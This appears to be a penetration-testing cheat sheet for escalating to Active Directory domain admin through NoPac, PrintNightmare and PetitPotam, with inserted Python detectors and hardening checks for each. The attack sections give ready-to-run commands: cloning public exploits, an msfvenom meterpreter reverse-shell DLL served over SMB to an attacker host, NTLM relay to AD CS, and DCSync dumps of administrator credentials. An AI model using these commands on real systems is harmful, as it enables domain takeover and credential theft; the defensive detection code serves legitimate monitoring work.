Privilege Escalation to Domain Admin using Known Exploits

NoPac

  • NoPac is an intra-domain privilege escalation exploit that allows a standard domain user to escalate to domain admin-level access.

  • This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.

  • The flow of the attack is outlined here: SecureWorks Blog

Exploiting NoPac:

  1. Get the NoPac exploit: git clone https://github.com/Ridter/noPac.git

  2. Check whether the target is vulnerable: sudo python3 scanner.py domain.name/validuser:validpassword -dc-ip 172.16.5.5 -use-ldap

  3. Get a SYSTEM shell as the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME -shell --impersonate administrator -use-ldap

  4. Perform DCSync against the built-in administrator: sudo python3 noPac.py DOMAIN.NAME/validuser:validpassword -dc-ip 172.16.5.5 -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator
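From the defender's side, the primitive the steps above rely on is a computer account whose sAMAccountName is changed to a domain controller's name (without the trailing `$`) and then changed back once a TGT has been obtained. The following is an added example, not code from the page or from the noPac project: it consumes Windows Security events 4741 (computer account created) and 4742 (computer account changed) as plain dicts and flags that pattern. The field names are assumptions modelled on the 4742 schema (adapt them to your SIEM's normalisation), and the DC list and sample events are constructed.

```python
"""Flag sAMAccountName tampering on computer accounts, the primitive NoPac relies on.

Added example, not from the page or the noPac project. Input is a list of
Windows Security events (4741 "computer account created", 4742 "computer
account changed") as plain dicts; the field names are assumptions modelled
on the 4742 schema, and the sample records below are constructed."""
from __future__ import annotations

from datetime import datetime, timedelta

# Hostnames of the domain controllers in the constructed environment.
KNOWN_DCS = {"DC01", "DC02"}


def _norm(name: str) -> str:
    """Compare account names case-insensitively and without the trailing '$'."""
    return name.rstrip("$").upper()


def classify_4742(event: dict, known_dcs: set[str] = KNOWN_DCS) -> list[str]:
    """Reasons a single 4742 event looks like a NoPac rename (empty list = benign)."""
    reasons: list[str] = []
    if event.get("event_id") != 4742:
        return reasons
    new_name = event.get("sam_account_name", "-")
    if new_name == "-":  # '-' means the attribute was not changed by this event
        return reasons
    if not new_name.endswith("$"):
        reasons.append("computer account sAMAccountName no longer ends with '$'")
    if _norm(new_name) in {_norm(dc) for dc in known_dcs}:
        reasons.append(f"new sAMAccountName matches domain controller {_norm(new_name)}")
    return reasons


def find_nopac_candidates(events: list[dict], known_dcs: set[str] = KNOWN_DCS,
                          window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """Group 4741/4742 events per object and report suspicious renames with context."""
    by_target: dict[str, list[dict]] = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        by_target.setdefault(ev["target_sid"], []).append(ev)

    alerts = []
    for sid, evs in by_target.items():
        suspicious = [(e, classify_4742(e, known_dcs)) for e in evs]
        suspicious = [(e, r) for e, r in suspicious if r]
        if not suspicious:
            continue
        first, reasons = suspicious[0]
        # In the NoPac flow the account is renamed back to a '$' name shortly
        # afterwards so the TGT obtained under the DC's name can be used.
        renamed_back = any(
            e["event_id"] == 4742
            and e.get("sam_account_name", "-").endswith("$")
            and first["time"] < e["time"] <= first["time"] + window
            for e in evs
        )
        creator = next((e["subject_user"] for e in evs if e["event_id"] == 4741), None)
        alerts.append({
            "target_sid": sid,
            "renamed_by": first["subject_user"],
            "created_by": creator,
            "renamed_back": renamed_back,
            "reasons": reasons,
        })
    return alerts


def _t(minute: int) -> datetime:
    return datetime(2024, 1, 1, 12, minute)


# Constructed sample: a low-privileged user creates a machine account,
# renames it to the DC's name without '$', then restores the original name.
SAMPLE_EVENTS = [
    {"event_id": 4741, "time": _t(0), "target_sid": "S-1-5-21-1-2-3-1105",
     "subject_user": "jdoe", "sam_account_name": "WS01$"},
    {"event_id": 4742, "time": _t(1), "target_sid": "S-1-5-21-1-2-3-1105",
     "subject_user": "jdoe", "sam_account_name": "DC01"},
    {"event_id": 4742, "time": _t(2), "target_sid": "S-1-5-21-1-2-3-1105",
     "subject_user": "jdoe", "sam_account_name": "WS01$"},
    # Benign: a password change on another computer leaves the name untouched.
    {"event_id": 4742, "time": _t(3), "target_sid": "S-1-5-21-1-2-3-1050",
     "subject_user": "WS07$", "sam_account_name": "-"},
]

if __name__ == "__main__":
    for alert in find_nopac_candidates(SAMPLE_EVENTS):
        print(alert)
```

The rename-back check is what separates a NoPac sequence from a one-off administrative rename; the `created_by` field is useful because the attack normally starts with a machine account created by an ordinary user under the default MachineAccountQuota, so that creator is the account to look at first.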


PrintNightmare

  • PrintNightmare is a vulnerability in the Print Spooler service, which runs by default on all Windows operating systems, that allows both local privilege escalation and remote code execution.

Exploiting PrintNightmare:

  1. Get the exploit: git clone https://github.com/cube0x0/CVE-2021-1675.git

  2. Install cube0x0's version of impacket:

    pip3 uninstall impacket
    git clone https://github.com/cube0x0/impacket
    cd impacket
    python3 ./setup.py install

  3. Check whether the Windows target has MS-PAR and MS-RPRN exposed: rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

  4. Generate a DLL payload to be used by the exploit to gain a shell session: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll

  5. Create an SMB server and host a shared folder (Data) pointing at the directory that contains the DLL payload, which the exploit will attempt to download: sudo smbserver.py -smb2support Data /path/to/dll-directory/

  6. Run the exploit, pointing it at the DLL on the share created in the previous step: sudo python3 CVE-2021-1675.py domain.name/validusername:validpassword@DC-IP '\\attacker-ip\Data\backupscript.dll'
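The exploit depends on the spooler accepting a driver install from a non-administrator via Point and Print. The following is an added example, not code from the page or from the CVE-2021-1675 repository: it parses the text that `reg query` prints for the PointAndPrint policy key and compares the values with Microsoft's published hardening guidance for PrintNightmare (no elevation bypass on driver install or update, and driver installation restricted to administrators), and it also flags a spooler running on a domain controller. The sample `reg query` outputs are constructed.

```python
"""Check Point and Print hardening that blunts PrintNightmare driver installs.

Added example, not from the page or the cube0x0 exploit. It parses the text
`reg query` prints for the PointAndPrint policy key and compares the values
against Microsoft's published hardening guidance for PrintNightmare.
The sample outputs are constructed."""
import re

POLICY_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

# Expected values: no elevation bypass on install/update, and driver
# installation restricted to administrators.
EXPECTED = {
    "NoWarningNoElevationOnInstall": 0,
    "UpdatePromptSettings": 0,
    "RestrictDriverInstallationToAdministrators": 1,
}

# Matches one value line of `reg query` output, e.g. "    Name    REG_DWORD    0x1".
_VALUE_LINE = re.compile(r"^\s*(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")


def parse_reg_query(text: str) -> dict:
    """Extract REG_DWORD name/value pairs from `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = _VALUE_LINE.match(line)
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def assess_point_and_print(values: dict, spooler_running: bool,
                           is_domain_controller: bool) -> list:
    """Return human-readable findings; an empty list means the host passes."""
    findings = []
    if is_domain_controller and spooler_running:
        findings.append("Print Spooler is running on a domain controller; "
                        "disable it unless the DC really serves printers")
    for name, want in EXPECTED.items():
        if name not in values:
            findings.append(f"{name} is not configured; set it explicitly to {want}")
        elif values[name] != want:
            findings.append(f"{name}={values[name]} weakens Point and Print "
                            f"(expected {want})")
    return findings


# Constructed `reg query` output for a host with permissive settings.
WEAK_OUTPUT = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
    UpdatePromptSettings    REG_DWORD    0x2
"""

# Constructed output for a host that follows the guidance.
HARDENED_OUTPUT = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
    NoWarningNoElevationOnInstall    REG_DWORD    0x0
    UpdatePromptSettings    REG_DWORD    0x0
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x1
"""

if __name__ == "__main__":
    for label, text, dc in (("weak DC", WEAK_OUTPUT, True),
                            ("hardened member", HARDENED_OUTPUT, False)):
        result = assess_point_and_print(parse_reg_query(text),
                                        spooler_running=True, is_domain_controller=dc)
        print(label, result or ["OK"])
```

An absent value is reported as a finding rather than assumed safe, because the effective default differs between patch levels; setting the three values explicitly through policy removes that ambiguity. On domain controllers the simpler answer is to stop and disable the spooler altogether, which also removes the MS-RPRN and MS-PAR endpoints that step 3 enumerates.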


PetitPotam

  • PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate to another host using NTLM over port 445.

  • When that coerced authentication is relayed to an AD CS web enrollment endpoint (as in the steps below), an unauthenticated attacker can take over the domain.

  • More information about PetitPotam can be found here: DirkJanm Post

Exploiting PetitPotam:

  1. Start an NTLM relay targeting the Certificate Authority's web enrollment endpoint: sudo ntlmrelayx.py -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authority/host --adcs --template DomainController. Note: you can use certi to find the location of the CA.

  2. Get PetitPotam: git clone https://github.com/topotam/PetitPotam.git

  3. Run PetitPotam: python3 PetitPotam.py attacker-ip dc-ip

  4. If it worked, the base64-encoded certificate for the domain controller appears in the output of the NTLM relay shell.

  5. Request a TGT for the domain controller using the certificate and save it to a ccache file: python3 /PKINITtools/gettgtpkinit.py DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> dc01.ccache

  6. Set the KRB5CCNAME environment variable to the previous output file: export KRB5CCNAME=dc01.ccache

  7. Perform DCSync using the previous ccache file (-k selects Kerberos authentication): secretsdump.py -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME
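Seen from the CA host, the relay in step 1 shows up as a network logon for the domain controller's computer account that uses NTLM and originates from the relay host's address rather than from the DC. The following is an added example, not code from the page or from the PetitPotam project: it scans 4624 (successful logon) events for exactly that combination. Field names follow the 4624 schema but are assumptions, and the DC inventory and sample events are constructed.

```python
"""Spot a DC machine account authenticating with NTLM from a non-DC address.

Added example, not from the page or the PetitPotam project. When coerced
authentication is relayed to an AD CS web enrollment endpoint, the CA host
logs a 4624 network logon for the DC's computer account using NTLM, sourced
from the relay host rather than the DC itself. Field names follow the 4624
schema but are assumptions; the DC inventory and sample events are constructed."""

# Hostname -> address of each domain controller (constructed inventory).
KNOWN_DCS = {"DC01": "172.16.5.5"}


def is_coerced_dc_logon(event: dict, known_dcs: dict = KNOWN_DCS) -> bool:
    """True when a DC computer account logs on over NTLM from an unexpected source."""
    if event.get("event_id") != 4624 or event.get("logon_type") != 3:
        return False  # only successful network logons matter here
    if event.get("auth_package", "").upper() != "NTLM":
        return False  # Kerberos logons by the DC are the normal case
    user = event.get("target_user_name", "")
    if not user.endswith("$"):
        return False  # only machine accounts are of interest
    expected_ip = known_dcs.get(user[:-1].upper())
    if expected_ip is None:
        return False  # a machine account, but not one of our DCs
    return event.get("ip_address") != expected_ip


def scan(events: list, known_dcs: dict = KNOWN_DCS) -> list:
    """Return the matching events, each with a short explanation attached."""
    hits = []
    for ev in events:
        if is_coerced_dc_logon(ev, known_dcs):
            expected = known_dcs[ev["target_user_name"][:-1].upper()]
            hits.append({**ev, "reason": (f"{ev['target_user_name']} used NTLM from "
                                          f"{ev['ip_address']} instead of {expected}")})
    return hits


# Constructed 4624 events as recorded on the CA web enrollment host (CA01).
SAMPLE_EVENTS = [
    # Normal: DC01 authenticates to the CA with Kerberos from its own address.
    {"event_id": 4624, "logon_type": 3, "auth_package": "Kerberos",
     "target_user_name": "DC01$", "ip_address": "172.16.5.5", "computer": "CA01"},
    # Suspicious: DC01's account arrives over NTLM from a workstation address.
    {"event_id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "target_user_name": "DC01$", "ip_address": "172.16.5.225", "computer": "CA01"},
    # Ordinary workstation NTLM logon; not a DC account, so ignored.
    {"event_id": 4624, "logon_type": 3, "auth_package": "NTLM",
     "target_user_name": "WS07$", "ip_address": "172.16.5.40", "computer": "CA01"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["reason"])
```

This rule is most valuable on AD CS hosts, since that is where the relayed logon lands; the preventive counterpart is to require Extended Protection for Authentication and HTTPS on the CA web enrollment endpoints, or to disable NTLM there entirely, so that a relayed DC authentication can no longer be turned into a certificate.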
